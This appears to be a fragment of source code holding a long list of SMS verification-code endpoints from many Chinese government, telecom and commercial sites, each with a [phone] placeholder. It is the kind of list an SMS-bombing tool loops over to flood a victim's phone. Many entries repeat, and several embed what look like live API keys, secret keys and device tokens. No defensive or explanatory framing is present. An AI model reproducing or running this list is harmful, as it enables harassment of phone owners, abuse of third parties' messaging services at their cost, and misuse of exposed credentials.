"http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://www.gangaimall.com/mbb-web/api/account/code?mobile=[phone]&type=0", + "https://doctor.helianhealth.com/api/v3/auth/common/getSMScode?cellphone=[phone]&sign=d821db6c5629ea532b9f8ff95e39e952&smsType=1&timestamp=1568266253&type=1", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://wx01.lecake.com/customer/get-code.html?mobile=[phone]&yzm=148323267", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "https://happy.mail.10086.cn/jsp/cn/club/login/smscode.do?r=0.24631415040371842&usermobile=[phone]", + "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", + "http://my.cnki.net/elibregister/Server.aspx?mobile=[phone]&temp=1551691791466&operatetype=2", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://mobile.icourses.cn/hep-mobile/sword/app/register/getCodeByPhone?callback=jQuery111009421744498287961_1580993309090&phone=1557078659&_=1580993309108", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://v.juhe.cn/sms/send?mobile=[phone]&tpl_id=11115&tpl_value=#code#=321809&key=a68cead9b27523c56ce7fd7fc1312ea4", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "https://cloud.maitao.com/auth/code?cityId=2&uid=&cfbundleversion=5.12.0&imei=32E30496-2A31-463B-A1BD-75B005303E41&channelid=AppStore&devicetoken=69103da60f6eca7a15a995f4f33371ce6413567d5df01d1335f6ab25a47a2f3c&fromapp=1&token=05F452E3F79B7410AC8962C7445483E81AD2ACC", + "https://app.aplum.com/user/sendmsg?fromApp=1&phone=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://baiwai100.com/exam/regcheckSms.yj?telphone=[phone]", + "https://ptlogin.4399.com:443/ptlogin/sendPhoneLoginCode.do?phone=[phone]", + "http://duanxin.diluw.com/index.php?hm=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://www.kaidikeji.com/registerPhoneYzmEx?phone=[phone]", + "https://register.7moor.com/Action?callback=jQuery17202698357481160306_1589614815141&action=register.rl7mWebSiteYZMWebCallTryMobileCode&data=%7B%22mobile%22%3A%22[phone]%22%7D&_=1589614821972", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://zhuikanxs.com/novelapilogin/sendsms?phone=[phone]&idfa=5C351103-F887-4932-BC59-58C75875EFDE&package=sxrqowww.com&version=1.6.9&token=384e798aee87f24f4a228a41df049e27&type=1&timestamp=1567400876&sign=9726d9876bd9e1bbc5667eeadd28e42b", + "https://idecoration.ikongjian.com/user/fetchCode?&deviceId=7676F5C4-1919-4FC8-9436-BBFD5BE87482&mobile=[phone]&type=1&token=YzVkMGVlYWMtZTU4My00MTc2LWJkMzYtZGZlMWRjODgwYjBkZDBiMDg4Y2QxZWZkLTYzZGItNjcxNC0zODVlLWNhZWUwZDVj", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", + "https://papa.51nbapi.com/mobile/app/phoneCheck?phone=[phone]&appName=sujiebaitiao&appChannel=AppStore&appVersion=1.2.0&appDevice=I", + "http://srmemberapp.srgow.com/sys/captcha/[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "https://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", + "https://passport.ziroom.com/verify/code/v2?phone=[phone]&type=1", + "https://secure.changba.com/ktvboxs.php?ac=phonestartentry&curuserid=0&channelsrc=appstore&version=9.1.1&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=78363e2e9ba7642df7b2f474a64b66b7cf7cdfbc&systemversion=12.4&device=iPhone8,1&b", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://passport.bignox.com/sso/o2/sms?method=send_mobile_login_sms&mobile=[phone]&operation=login&request_token=RT-946987-zwaBUfZnSTD2qfrc04fvX9J2Pd7AyN-bignox.com", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://api.botbrain.ai/fish/v1/login/captcha?dt=1578983039143&guid=12739063-4134-3aa6-d867-8a912fce4104&sid=e267b2e5-9134-3aa6-d867-8be4bc4334b7&plt=android&uid=&mobile=%20[phone]&type=bind", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=15", + "http://www.6dspeaker.com/sdspeaker/public?method=getPhoneCode&phone=[phone]&countryCode=%2B86&validateType=1", + "http://i.xfvw.cn/api/sms/send?mobile=[phone]&event=register", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "https://passport.eqxiu.com/eqs/sms/token?phone=[phone]&type=quickLogin&checkPhone=1&channel=21&version=4.4.1", + "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]&comefrom=7&auth=&msgtype=0", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "https://api.intsig.net/user/cs/send_emailsms_with_verify?account=[phone]&account_type=mobile&area_code=86&client_app=CamScanner_IP_FREE%405.12.1.1907311855&device_id=4f06e7989623c84b4c88dddc46724ea2&language=zh-cn&type=login_via_vcode", + "https://m.health.pingan.com:443/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", + "http://wx.airjiangxi.com/html5_jx/main?sourceid=&apptype=&appcode=&developer=&channel=&usertype=&userid=&actionCode=18&type=0&cotentType=1&mobileORemail=[phone]&ffpid=&pidNumber=", + "http://www.easgs.cn/app/index.php?i=8&c=entry&do=sms&m=junsion_winaward_plugin_wap&mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://quan.lukou.com/api/sms/verification_code?phone=[phone]&sign=74F59C2BB6F3830D6EB835FDA7550EB7&t=1564024638", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "https://secure.changba.com/ktvboxs.php?ac=phonestartentry&curuserid=0&channelsrc=appstore&version=9.1.1&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=78363e2e9ba7642df7b2f474a64b66b7cf7cdfbc&systemversion=12.4&device=iPhone8,1&b", + "https://wap.fruitday.com//v3/passport/send_vercode?mobile=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://www.dangaoss.com/h5/acc/send_code?_t=1552475308&sign=424064b2d2d003d83db05380438824cb&username=[phone]", + "http://ketang.ldcstudy.com/nsuser/h5/getCode.vm?phone=[phone]&servicekey=", + "https://iosapi.shixiseng.com/app/telrandcode?sign=6F4C6784400B289D3B0BC2742D704E59&tel=[phone]&time=1564926500.453583&type=reg", + "http://www.txooo.com/Txooo/Main/BusinessRequirement/Ajax/BusinessRequirementAjax.ajax/SendMobileCode?mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://flights.sichuanair.com/3uair/ibe/profile/processSendSMSNew.do?ConversationID=&smsType=REGISTER&mobilePhone=[phone]&verkey=MOBILELOGIN", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://ttq.api.yolanda.hk/api/v5/users/identifying_code.json?address=&app_id=TTQ&app_revision=2.2.2&cellphone_type=iPhone%206s-12.4&login=[phone]&mob_type=1&platform=iphone&send_type=1&systemLaunguage=zh-Hans-CN", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://hbrbapi.hubeidaily.net/amc/client/getAuthCode?mobilephone=[phone]&nodeCode=ecdc5307-888e-4322-8817-f04bd81a7e82", + "http://my.baihe.com/Getinterregist/captchaAndRegCheck?account=[phone]&type=1", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://babyheartapi.ihealthbaby.cn/BabyheartServer/sms/sendMessage?sendType=1&smsType=1&tel=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://mobile.yougou.com/v_1.8/quicklyLoginMobileverify?username=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://www.zkzcfu.cn/api/sms/send?mobile=[phone]&event=register", + "http://iu.snssdk.com/user/mobile/send_code/?iid=80794405933&type=1&mobile=[phone]&ac=WIFI&channel=App%20Store&app_name=joke_zone&aid=27&version_code=2.2.0&device_platform=iphone&os_version=12.4&device_type=iPhone8,1&device_id=68923678300&vid=FFAA4EA8-1E5C-4EA0-9A1E", + "https://helper.2bulu.com/sendValidateCode?p_userId=0&p_productType=0&p_terminalType=2&p_appVersion=6.1.0&mobileNumber=[phone]&unique=1&areaCode=86", + "http://www.zuisgo.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&firewallToken=jkjslfskjk8545sfsdf&uid=&token=&loginTime=&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://www.cshixi.com/api/sendCode?username=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=2", + "http://prod.layadmin.cn/api/message/sendV2?app_id=1&version=1.4.0&channel_id=001&phone=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "https://api.botbrain.ai/fish/v1/login/captcha?dt=1578983039143&guid=12739063-4134-3aa6-d867-8a912fce4104&sid=e267b2e5-9134-3aa6-d867-8be4bc4334b7&plt=android&uid=&mobile=%20[phone]&type=bind", + "http://user.daojia.com/mobile/getcode?mobile=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "https://beacons.gcp.gvt2.com/domainreliability/upload", + "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]&comefrom=7&auth=&msgtype=0", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=9", + "https://pass.hujiang.com/v2/Handler/UCenter?action=SendMsg&imgcode=&token=1e7bbab658a5b65cbc3074d6296a0b9b&sendtype=register&msgtype=1&captchaVersion=2&user_domain=hj&business_domain=&hpuid=P0S4wETf4noqmS29L5650&callback=reqwest_1546707722757024049&mobile=%2B86-[ph", + "https://masterhands.yladm.com/user/phone/verifycode?app=gaoshou_i&brand=apple&idfa=5C351103-F887-4932-BC59-58C75875EFDE&model=iphone&phone=[phone]&refer=hometabpage&sid=appstore&sign=dfe50ccd14bb2c905e37b4706c5e633c&tcid=5f401e59cddf4345a511010d2c268592&timestamp=1", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://apis.changbalive.com/apis.php?ac=registerwithphone&curuserid=&channelsrc=appstore&version=3.0.2&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=e77c9aae3b3d1994fdb56947e974fc21fcf20f99&systemversion=12.4&device=iPhone8,1&b", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://passport2.chaoxing.com/num/phonecode?phone=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", + "http://api.fine3q.com/link-site/api/user/get_verification_code.json?ts=1561901787148&c_id=1&p=a&d_id=861913032338784&ver=3.1.5&mobile=[phone]", + "http://www.gkbbapp.com/Support/JsonNews.aspx?sendShortMessage=yes&Telephone=[phone]", + "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", + "http://www.easgs.cn/app/index.php?i=8&c=entry&do=sms&m=junsion_winaward_plugin_wap&mobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", + "http://jyw.vhujao.cn/m/reg/motregchk.php?mob=[phone]", + "http://puser.funshion.com/user/sendappsmscodenocaptcha?app=main&app_code=iphone&cl=iphone&content=%E6%82%A8%E7%9A%84%E7%9F%AD%E4%BF%A1%E9%AA%8C%E8%AF%81%E7%A0%81%E6%98%AF%3A%25verifycode%25%E3%80%82%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E5%8F%B7%E6%AD%A3%E5%9C%A8%E4%", + "http://www.fvv678.cn/app/user/checkMobileReg?mobile=[phone]&token=0&timestamp=1558355544&sign=c906bc234a2b4ac71ed23cae0147092b", + "http://newm.yktour.com.cn/api/captcha/login/info/get?mobile=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://www.yundaipay.com/index/user/getMsgCode?username=[phone]", + "http://m.jianshe99.com/m_member/member/mobile_register/resendMsg.shtm?jsonpCallback=&_=&mobilePhone=[phone]", + "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]&_=1570683350704", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://m.api.cetv.cn/v2/member?app_version=2.1.0&sign=f631db0bcb5fabc1b76679d9480e4f73&device_id=74:4A:A4:A6:B0:63&time=1561078945566&mobile=[phone]&system_name=android&ip=192.168.43.217&siteid=10001&clientid=1&modules=needcaptcha:1&type=android", + "http://app.zangcun.com/registerCode?mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://i.xfvw.cn/api/sms/send?mobile=[phone]", + "http://www.newtank.cn/newtank/act/sendCaptcha.do?activityId=161&channelId=15399&_d=1506594279964&mobile=[phone]&_=1551173567874", + "https://id.ifeng.com/api/simplesendmsg?comefrom=38&msgtype=0&auth=&mobile=[phone]", + "https://ubas.360jie.com.cn/ubas/event/report?flowNo=49181563973602947&bizCode=REGISTER_LOGIN&eventCode=SEND_SMSCODE&pageName=login.html&ABTest=A&TuanABTest=A&userOprTime=1563973631831&hostApp=APP&sourceType=APK&channelSource=CH_001_IOS&subChannel=&activityInfo=&utm", + "http://www.sbsq.aliwe.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://api9000.chengqinhr.xyz/app/getQmjzSms/[phone]?appid=com.qgjz.ptjz", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]", + "http://sms.bechtech.cn/Api/send/data/json?accesskey=1730&secretkey=3f198068c6b5c1036f9b38ae0690cc244695a247&mobile=[phone]&content=%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E9%AA%8C%E8%AF%81%E7%A0%81%E4%B8%BA%EF%BC%9A3973+%EF%BC%8C%E8%AF%A5%E9%AA%8C%E8%AF%81%E7%A0%8110%", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://client.cangshuyuedu.com/api/Sys/SendSmsAuthCode?callback=jQuery111009421744498287961_1580993309090&pType=4&app_version=2.0.7&pkgname=com.yokong.bookfree&channel_id=1&device_id=f75c53c90f4a6635d5f6c7136120154d&mob=[phone]&platform=IOS&uid=0&token=bfd31758556", + "http://www.lecake.com/customer/get-code.html?yzm=10000&mobile=[phone]&_=1551173567939", + "http://www.henhuoapp.com/api/method/getCode?phone=[phone]&type=1", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=3", + "https://ddxq.mobi/api/v1/user/mobile/check/?api_version=8.30.2&app_client_id=1&channel=App%20Store&countryCode=CN&device_id=a3bd2adebf3a389bb044fea62d52c8c55a1577ce&device_model=iPhone8%2C1&device_name=iPhone%206s&languageCode=zh&latitude=29.587192&localeIdentifier", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=5", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=1", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]", + "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "https://webapi.account.mihoyo.com/Api/create_mobile_captcha?action_ticket=&action_type=regist&mobile=[phone]", + "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]&_=1535534872440", + "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", + "https://nhapi02.tv189.com/cpms/Internet?appid=111010310225&phone=[phone]&cliver=1.32.1.6&idfa=5C351103-F887-4932-BC59-58C75875EFDE&NetType=WIFI&channelID=01834721&type=register&iosid=ccb2ffcb0bc0a5b42678ac61fed3372bed1ce69a&token=b1fa0dc43dc3ed1b9c4d9cb5f5e57529&pc", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://sms.bechtech.cn/Api/send/data/json?accesskey=1730&secretkey=3f198068c6b5c1036f9b38ae0690cc244695a247&mobile=[phone]&content=%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E9%AA%8C%E8%AF%81%E7%A0%81%E4%B8%BA%EF%BC%9A3973+%EF%BC%8C%E8%AF%A5%E9%AA%8C%E8%AF%81%E7%A0%8110%", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://zk.weegoo.cn/zhuanKe/api/smss/send?phone=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://yunrg3866.xahost.yunrg.com/api.php?act=user&key=hz&phone=[phone]", + "http://quan.lukou.com/api/sms/verification_code?phone=[phone]&sign=74F59C2BB6F3830D6EB835FDA7550EB7&t=1564024638", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "https://apis.changbalive.com/apis.php?ac=registerwithphone&curuserid=&channelsrc=appstore&version=3.0.2&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=e77c9aae3b3d1994fdb56947e974fc21fcf20f99&systemversion=12.4&device=iPhone8,1&b", + "https://shared.ivydad.com/api/mobile/member/sendSmsCode?callback=jQuery111009421744498287961_1580993309090&appid=wx0e2dec5e762806fd&version=2.8.1&app_name=ivydad&channel=App Store&sys_version=12.4.1&type=register&sys_type=ios&token=&member_uuid=0&device_name=iPho", + "http://www.kaidikeji.com/registerPhoneYzmEx?phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://howe.xiumaikeji.com/api/v1/howeFront/user/userIsRegist?phone=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://ubas.360jie.com.cn/ubas/event/report?flowNo=49181563973602947&bizCode=REGISTER_LOGIN&eventCode=SEND_SMSCODE&pageName=login.html&ABTest=A&TuanABTest=A&userOprTime=1563973631831&hostApp=APP&sourceType=APK&channelSource=CH_001_IOS&subChannel=&activityInfo=&utm", + "https://papa.51nbapi.com/mobile/app/phoneCheck?phone=[phone]&appName=sujiebaitiao&appChannel=AppStore&appVersion=1.2.0&appDevice=I", + "http://klfsh.mangguohd.com/mghdSys/android/sign/sendMobileVerifyCode/[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", + "https://john.ixiaolu.com/account/check_account_name?ab_ver=A&account_name=86-[phone]&app_channel=&device=iPhone8%2C1&device_id=5C351103-F887-4932-BC59-58C75875EFDE&login_user_id=0&pcid=ae1895f8187711a6bf727e6d14b0588d&phone_sn=9e633777bc1a27c4cb826b1a4c6309dd34eb80", + "http://user.app.nanrenbang.in/user/user/getvalidate?phone=[phone]", + "http://user.app.nanrenbang.in/user/user/getvalidate?phone=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://n.daoxila.com/verification/appSend?mobile=[phone]&time=1564746677059", + "http://www.dgzz1.com:20002/LoginMobileYanZheng?MOBILE=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "https://idecoration.ikongjian.com/user/fetchCode?&deviceId=7676F5C4-1919-4FC8-9436-BBFD5BE87482&mobile=[phone]&type=1&token=YzVkMGVlYWMtZTU4My00MTc2LWJkMzYtZGZlMWRjODgwYjBkZDBiMDg4Y2QxZWZkLTYzZGItNjcxNC0zODVlLWNhZWUwZDVj", + "http://jieapi.profacty.cn/api/verification/sendPhone?phone=[phone]&type=102&timestamp=1559301154413&sign=e720200313338403aaa8e13a3f333da7", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://www.chaojidaogou.com/MsgHandler.ashx?t=sendcode&phone=[phone]", + "http://user.yuntuds.net/register_get_valid_number?sign=a316b3d460901f104f9e8e84662640c0&phone_number=[phone]&nwtime=1548162361&_u=acde09261c08497067779e1fd4ee4a6e&version=4.5.1&platform=android&appx=yuntu&apppn=org.fungo.fungolive&channel=tencent&market=32&os_versi", + "http://jyqb.jyqb168.com/registerH5/registerCode?phone=[phone]&invite_code=MTE3MDUx&user_from=97bf875e61bd47f", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://app.yioucash.com/loan-h5/app/validcode/send?atype=1&phoneNo=[phone]&atype=2", + "https://www.xhsd.cn/front/CheckLogin.jsp?cmd=telcheckr&Mobile=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://user.daojia.com/user/getSmscode?mobile=[phone]", + "http://m.business-steward.com/ticket/application/message/send_msg.php?tel=[phone]&type=forget", + "http://www.dangaoss.com/h5/acc/send_code?_t=1552475308&sign=424064b2d2d003d83db05380438824cb&username=[phone]", + "https://appapi.51job.com/api/user/get_verification_type.php?mobilephone=[phone]&nation=CN&type=0&format=json&guid=56fa5d7a032a8190dd9844ebaa211181&partner=237b12de4c48eacec5a368eb192c3c5e&productname=51job&uuid=e7ab248c2ba73cb851a1eb31aa138695&version=869", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://hz.95sc.cn/api.php?act=user&key=7awn1zd6tRCRuTDD1c&phone=[phone]", + "http://case.100.com/captcha?source=57&mobile=[phone]&resend=0&mkey=customer", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + 